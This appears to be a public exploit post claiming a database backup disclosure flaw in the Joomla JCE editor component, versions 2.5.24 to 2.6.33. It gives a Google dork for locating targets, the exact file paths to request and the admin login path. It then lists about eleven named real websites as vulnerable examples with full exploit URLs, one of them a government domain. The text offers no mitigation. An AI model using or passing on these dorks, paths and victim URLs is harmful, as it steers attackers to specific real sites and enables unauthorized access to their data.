Joomla JCE component versions 2.5.24 through 2.6.33 suffer from a database backup disclosure vulnerability.
11d1533fb969ec89076f617df0809376#################################################################################################
# Exploit Title : Joomla Content Editor Com_JCE Components 2.5.24 Database
Backup Disclosure Information Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security
Army
# Date : 30/11/2018
# Vendor Homepage : joomlacontenteditor.net
# Software Download Links : joomlacontenteditor.net/downloads/
+
github.com/joomla/volunteers.joomla.org/tree/master/www/administrator/components/com_jce/sql
+
gitlab.dev.playkey.net/realzkh/realzkh_legacy/tree/master/administrator/components/com_jce/sql
+ JCE 2.6.33 =>
joomlacontenteditor.net/downloads/editor/core?task=callelement&format=raw&item_id=1353&element=
f85c494b-2b32-4109-b8c1-083cca2b7db6&method=download&args[0]=9ee3309d5768681d0360490d647c2266
+ JCE 2.5.24 => joomlacontenteditor.net/news/jce-2524-released
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 2.6.33 ~ 2.5.24
# Google Dorks : inurl:''/index.php?option=com_jce''
Index of /administrator/components/com_jce/sql/
# Exploit Risk : Medium
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access
Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
#################################################################################################
# Admin Panel Login Path :
/administrator/
# Exploit :
/administrator/components/com_jce/sql/mysql.sql
/administrator/components/com_jce/sql/postgresql.sql
/administrator/components/com_jce/sql/sqlsrv.sql
#################################################################################################
# Example Vulnerable Sites =>
[+] volunteers.joomla.org/www/administrator/components/com_jce/sql/mysql.sql
[+]
freightdb.kzntransport.gov.za/administrator/components/com_jce/sql/mysql.sql
[+] murraynebraska.com/nl/administrator/components/com_jce/sql/mysql.sql
[+] rkbell.ca/joomla30/administrator/components/com_jce/sql/mysql.sql
[+] vir.nw.ru/test/vir.nw/administrator/components/com_jce/sql/mysql.sql
[+]
weepingwaternebraska.com/nl/administrator/components/com_jce/sql/mysql.sql
[+] fotozrak.mk/print/administrator/components/com_jce/sql/mysql.sql
[+]
colegioconcepciondeparral.cl/ccparral/administrator/components/com_jce/sql/mysql.sql
[+] elmwoodnebraska.com/nl/administrator/components/com_jce/sql/mysql.sql
[+]
nowagalicja.itl.pl/files/jce/administrator/components/com_jce/sql/sqlsrv.sql
[+] aeroglobal.org/ios/administrator/components/com_jce/sql/mysql.sql
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################